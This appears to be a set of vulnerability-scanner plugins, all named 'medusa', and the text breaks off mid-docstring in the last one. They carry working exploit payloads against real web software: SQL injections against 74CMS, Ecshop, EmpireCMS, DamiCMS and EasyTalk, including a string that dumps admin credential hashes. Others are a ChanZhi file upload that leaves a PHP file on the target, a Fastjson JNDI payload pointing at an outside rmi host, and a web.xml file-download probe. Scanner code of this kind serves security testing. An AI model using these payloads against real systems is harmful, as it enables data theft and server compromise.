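def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe 74CMS ``/plus/ajax_user.php?act=check_email`` for SQL injection.

    Args:
        Url: target base URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: User-Agent string sent with the request.
        UnixTimestamp: handed through to VulnerabilityDetails for the record.

    Returns None. A match is persisted through VulnerabilityDetails and
    WriteFile; any exception inside the probe is routed to
    ErrorHandling/ErrorLog instead of being raised.

    Fix: the requests.Session was created but never closed, leaking the
    pooled connection; it is now used as a context manager.
    """
    # NOTE(review): sibling plugins call UrlProcessing().result(Url) — confirm which API is current.
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/plus/ajax_user.php?act=check_email"
        # Wide-byte quote escape (錦 = %e9%8c%a6 followed by ') plus a boolean
        # condition on the second character of md5(c) from qs_admin.
        data = "email=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),2,1))>100 as signed) %23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False is deliberate for self-signed scan targets; it also
        # removes MITM detection, so only route through trusted proxies.
        with requests.Session() as session:
            resp = session.post(payload_url, data=data, headers=headers, timeout=6, verify=False)
        con = resp.text
        # NOTE(review): the payload is boolean-blind, yet the match expects the
        # literal md5('c') digest in the body — confirm against a vulnerable instance.
        if '4a8a08f09d37b73795649038408b5f33' in con:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # persist url + evidence
            WriteFile().result(str(url), str(Medusa))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)  # log target URL and the failing plugin name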
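def medusa(**kwargs) -> None:
    """Probe ChanZhi EPS for an unauthenticated package upload that yields a webshell.

    kwargs: ``Url`` (target base URL), ``Headers`` (request headers),
    ``Proxies`` (requests proxy mapping). Returns None; a confirmed finding
    is persisted via VulnerabilityDetails and WriteFile, exceptions go to
    ErrorHandling/ErrorLog.

    WARNING: unlike the read-only checks in this corpus, this plugin writes
    ``system/tmp/package/php.php`` onto the target and leaves it there.
    Run only with authorization and remove the file afterwards.

    Fixes vs. the previous version:
      * the multipart body was hand-built with a WebKit boundary but no
        matching ``Content-Type: multipart/form-data; boundary=...`` header
        (and carried source indentation on every line), so the server could
        not parse the form; ``requests`` ``files=`` now builds body+header.
      * the probe file was ``<?php echo md5(c);>``: the closing tag lacked
        ``?`` (parse error) and ``c`` was an undefined constant (an Error on
        PHP 8). It is now ``<?php echo md5('c');?>``, which prints the digest
        the check looks for.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        payload_url = url + '/chanzhi/admin.php?m=package&f=upload'
        verify_url = url + '/chanzhi/system/tmp/package/php.php'
        # Drop any caller-supplied Content-Type so requests can set the multipart boundary itself.
        upload_headers = {k: v for k, v in (Headers or {}).items() if k.lower() != 'content-type'}
        files = {"file": ("php.php", "<?php echo md5('c');?>", "text/php")}
        # verify=False: scanner deliberately accepts self-signed certificates.
        requests.post(payload_url, files=files, headers=upload_headers, proxies=proxies, timeout=6, verify=False)
        resp = requests.get(verify_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if "4a8a08f09d37b73795649038408b5f33" in con:  # md5('c')
            Medusa = "{}存在ChanZhiEPSGetShell漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(Medusa))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)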
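def medusa(**kwargs) -> None:
    """Probe for Fastjson deserialization RCE via the JdbcRowSetImpl JNDI gadget.

    kwargs: ``Url`` (endpoint that parses JSON bodies), ``Headers``,
    ``Proxies``. Returns None; a finding is persisted via VulnerabilityDetails
    and WriteFile, exceptions go to ErrorHandling/ErrorLog.

    Detection is out-of-band: the body points ``dataSourceName`` at an
    ``rmi://`` host on the DNSlog domain and the plugin reports when that
    name resolves AND the target answered 400. No code is executed on the
    target by this probe.

    Fix: the caller's ``Headers`` dict was mutated in place (Content-Type and
    Connection were added), which can poison later form-encoded requests if
    the dict is shared across plugins; a copy is modified instead.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        payload_url = url
        DL = Dnslog()
        data = '''{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://%s/Exploit",
        "autoCommit": true
    }
}
''' % DL.dns_host()
        request_headers = dict(Headers or {})
        request_headers['Content-Type'] = 'application/json'
        request_headers["Connection"] = "close"
        # verify=False: scanner deliberately accepts self-signed certificates.
        resp = requests.post(payload_url, headers=request_headers, data=data,
                             proxies=proxies, timeout=10, verify=False)
        if DL.result() and resp.status_code == 400:
            Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
                url, payload_url, resp.text, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(Medusa))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)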
def medusa(Url, RandomAgent, Token, proxies=None):
    """Probe 74CMS ``admin_baiduxml.php?ac=setsave`` for error-based SQL injection.

    Args:
        Url: target base URL, split by UrlProcessing.
        RandomAgent: User-Agent string.
        Token: handed through to VulnerabilityDetails.
        proxies: optional proxy spec, normalised by Proxies().result.

    Returns None. A hit is reported when the body contains both
    ``Error:Query error`` and the reflected ``value='aaa'`` fragment.
    Exceptions are logged via ErrorHandling/ErrorLog, never raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = '/upload/admin/admin_baiduxml.php?ac=setsave'
        # An unbalanced quote inside a parameter NAME triggers the SQL error.
        body = "xmlmax=1111&xmlpagesize=112&sunrain'=aaa"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.post(payload_url, data=body, headers=headers,
                                 proxies=proxies, timeout=6, verify=False)
        text = response.text
        if "Error:Query error" in text and "value='aaa'" in text:
            report = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, Token).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe 74CMS ``admin_category.php?ac=edit_color_save`` for UNION SQL injection.

    Args:
        Url: target base URL, split by UrlProcessing.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit is the md5('c') digest appearing in the response.
    Exceptions are logged via ErrorHandling/ErrorLog, never raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = '/upload/admin/admin_category.php?ac=edit_color_save'
        body = "val=xx&id=1 union select md5(c),2,3,4"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.post(payload_url, data=body, headers=headers,
                                 proxies=proxies, timeout=6, verify=False)
        text = response.text
        if "4a8a08f09d37b73795649038408b5f33" in text:  # md5('c')
            report = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe Ecshop ``admin/affiliate_ck.php`` for error-based (updatexml) SQL injection.

    Args:
        Url: target base URL, split by UrlProcessing().result.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit is the md5('c') digest surfacing in the XPath error
    text. Exceptions are logged via ErrorHandling/ErrorLog, never raised.
    The payload also leaks ``user()`` into the error; keep reports private.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = "/admin/affiliate_ck.php?act=list&auid=3+and+updatexml(1,concat(0x7e,concat(md5(c),0x3a,user()),0x7e),1)"
        body = "status=1&order_sn=2"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        # NOTE(review): Content-Type says JSON while the body is form-encoded;
        # presumably the endpoint ignores it — confirm before "fixing".
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.post(payload_url, headers=headers, data=body,
                                 timeout=6, proxies=proxies, verify=False)
        text = response.text
        if "4a8a08f09d37b73795649038408b5f33" in text:  # md5('c')
            report = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe DamiCMS ``/index.php?s=/api/ajax_arclist`` for SQL injection via ``field``.

    Args:
        Url: target base URL, split by UrlProcessing().result.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit requires HTTP 200 and a substring of md5(1)
    (``c4ca4238a0b923820dcc509a6f75849b``) in the body. Exceptions are logged
    via ErrorHandling/ErrorLog, never raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = "/index.php?s=/api/ajax_arclist/model/article/field/md5(1)%23"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=headers, proxies=proxies,
                                timeout=6, verify=False)
        text = response.text
        matched = response.status_code == 200 and "ca4238a0b923820dcc509a6f75849" in text
        if matched:
            report = "{}存在大米CMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
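def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe 74CMS ``/plus/ajax_officebuilding.php?act=key`` for wide-byte SQL injection.

    Args:
        Url: target base URL, split by UrlProcessing.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit is md5(7836457) (``3438d5e3ead84b2effc5ec33ed1239f5``)
    appearing in the body. Exceptions are logged via ErrorHandling/ErrorLog.

    Fix: the query string carried a raw ``%錦`` — a ``%`` followed by a
    non-hex character is not a valid percent escape, so requests re-quoted
    the character and the target received a stray ``%`` before the wide-byte
    quote. The wide byte is now spelled explicitly as ``%E9%8C%A6`` (UTF-8 of
    錦), matching the already-encoded sibling plugin.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # Keyword splitting (uniounionn / selselectect) defeats the CMS's keyword stripping filter.
        payload = "/plus/ajax_officebuilding.php?act=key&key=asd%E9%8C%A6%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if '3438d5e3ead84b2effc5ec33ed1239f5' in con:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(Medusa))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)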
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe 74CMS ``/plus/ajax_common.php?act=hotword`` for wide-byte UNION SQL injection.

    Args:
        Url: target base URL, split by UrlProcessing.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit is md5(736482) (``5cee14937d463a819651c8e1c504613c``)
    in the body. Exceptions are logged via ErrorHandling/ErrorLog.

    The raw 錦 and ``<>`` keyword splits are percent-encoded by requests on
    the wire. ``EXP`` below is reference material only — it would dump admin
    credentials and is intentionally never sent by this plugin.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(736482),3%23"
        # Not sent: credential-extraction variant kept for manual follow-up.
        EXP = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,group_concat(admin_name,0x3a,pwd,0x3a,pwd_hash),3%20fr<>om%20qs_admin%23"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if '5cee14937d463a819651c8e1c504613c' in text:
            report = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Fingerprint Cacti ``graph_realtime.php?action=init`` (command-injection endpoint).

    Args:
        Url: target base URL, split by UrlProcessing().result.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. This check only confirms the endpoint responds 200 with
    ``poller_realtime.php`` in the body; it never sends a command, so a
    report here means "exposed endpoint", not "exploitation verified".
    The upstream note describes weaponising it through the ``Cacti`` cookie
    with a netcat reverse shell — that is deliberately not implemented.
    Exceptions are logged via ErrorHandling/ErrorLog, never raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = "/graph_realtime.php?action=init"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if response.status_code == 200 and "poller_realtime.php" in text:
            report = "{}存在Cacti任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe EmpireCMS ``/ikaimi/rolling/list.php`` for UNION SQL injection via ``classid``.

    Args:
        Url: target base URL, split by UrlProcessing().result.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit requires HTTP 200 and md5(123)
    (``202cb962ac59075b964b07152d234b70``) in the body. Exceptions are logged
    via ErrorHandling/ErrorLog, never raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = '/ikaimi/rolling/list.php?line=10&page=&classid=10)%20UNION%20ALL%20SELECT%20CONCAT(0x71786a7171,md5(123),0x716a6b6b71),NULL,NULL,NULL,NULL--%20'
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if response.status_code == 200 and "202cb962ac59075b964b07152d234b70" in text:
            report = "{}存在EmpireCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe Ecshop ``/ecshop/api.php`` (search_goods_list) for UNION SQL injection.

    Args:
        Url: target base URL, split by UrlProcessing().result.
        RandomAgent: User-Agent string.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns None. A hit is md5('c') in the body. The duplicated ``ac=``
    parameter in the body is part of the known bypass and is kept verbatim.
    Exceptions are logged via ErrorHandling/ErrorLog, never raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        endpoint = "/ecshop/api.php"
        body = "return_data=json&ac=1&ac=search_goods_list&api_version=1.0&last_modify_st_time=1&pages=1&counts=1 UNION ALL SELECT NULL,CONCAT(0x20,IFNULL(CAST(md5(c) AS CHAR),0x20),0x20)#"
        payload_url = "{}://{}:{}{}".format(scheme, url, port, endpoint)
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
        }
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.post(payload_url, headers=headers, data=body,
                                 timeout=6, proxies=proxies, verify=False)
        text = response.text
        if "4a8a08f09d37b73795649038408b5f33" in text:  # md5('c')
            report = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, url, **kwargs).Write()  # persist url + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write(url, plugin)
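def medusa(**kwargs) -> None:
    """Probe Ecshop ``/ecshop/respond.php`` (alipay) for error-based SQL injection.

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None; a hit (md5('c') in the body) is persisted via VulnerabilityDetails
    and WriteFile, exceptions go to ErrorHandling/ErrorLog.

    The duplicate-key error also returns the first ``ecs_admin_user`` user
    name next to the marker, so the stored evidence contains a real account
    name — treat result files as sensitive.

    Fix: the injection point used a typographic prime (``′``, U+2032)
    instead of an ASCII single quote, so the NUL-byte quote break never
    reached the SQL string and the probe could not fire.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        payload = "/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00' and (select * from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,md5(c)) from ecs_admin_user limit 1))a from information_schema.tables group by a)b)"
        payload_url = url + payload
        # verify=False: scanner deliberately accepts self-signed certificates.
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if "4a8a08f09d37b73795649038408b5f33" in con:  # md5('c')
            Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(Medusa))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)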
def medusa(**kwargs) -> None:
    """Probe Huisi (汇思) ``/cw/skin1/jsp/download.jsp`` for arbitrary file download.

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None; a hit is HTTP 200 with ``log4jConfigLocation`` in the returned
    ``WEB-INF/web.xml``. A web.xml without that parameter is therefore not
    detected — this is a fingerprint of a specific deployment, not a
    general traversal check. Exceptions go to ErrorHandling/ErrorLog.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        payload_url = url + "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, timeout=6,
                                proxies=proxies, verify=False)
        text = response.text
        if response.status_code == 200 and 'log4jConfigLocation' in text:
            report = "{}存在汇思软件任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(**kwargs) -> None:
    """Probe EasyTalk ``/?m=app&a=myapp`` for UNION SQL injection via ``keyword``.

    kwargs: ``Url`` (target base URL), ``Headers``, ``Proxies``. Returns
    None; a hit requires HTTP 200 and md5('c') in the body. The raw ``%'``
    in the query is left as-is so the ``%`` reaches the LIKE clause.
    Exceptions go to ErrorHandling/ErrorLog, never raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        payload_url = url + "/?m=app&a=myapp&keyword=yu%'union select 1,2,3,4,md5(c),6,7,8,9,10,11,12,13,14,15,16,17#"
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, proxies=proxies,
                                timeout=6, verify=False)
        text = response.text
        if response.status_code == 200 and "4a8a08f09d37b73795649038408b5f33" in text:
            report = "{}存在EasyTalkSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
def medusa(**kwargs) -> None:
    """Check for a BT (宝塔) panel exposing phpMyAdmin without auth on port 888.

    kwargs: ``Url`` (target base URL; its port is rewritten to 888 by
    PortReplacement), ``Headers``, ``Proxies``. Returns None; a hit is HTTP
    200 at ``/pma/`` whose body contains ``phpMyAdmin``, ``sql`` and ``New``
    — i.e. the logged-in navigation rendered without a login form.
    Exceptions go to ErrorHandling/ErrorLog, never raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    url = PortReplacement(url, 888)
    try:
        payload_url = url + '/pma/'
        # verify=False: scanner deliberately accepts self-signed certificates.
        response = requests.get(payload_url, headers=Headers, proxies=proxies,
                                timeout=6, verify=False)
        text = response.text
        markers_present = all(token in text for token in ("phpMyAdmin", "sql", "New"))
        if response.status_code == 200 and markers_present:
            report = "{}存在宝塔面板未授权访问phpMyAdmin数据库漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format(url, payload_url, text)
            info = VulnerabilityInfo(report)
            VulnerabilityDetails(info.info, response, **kwargs).Write()  # persist response + evidence
            WriteFile().result(str(url), str(report))  # per-target result file
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin)
        ErrorLog().Write("Plugin Name:" + plugin + " || Target Url:" + url, e)
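def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check for an exposed Sublime SFTP ``sftp-config.json`` (credential leak).

    Args:
        Url: target base URL.
        Headers: request headers supplied by the caller.
        proxies: optional proxy spec, normalised by Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

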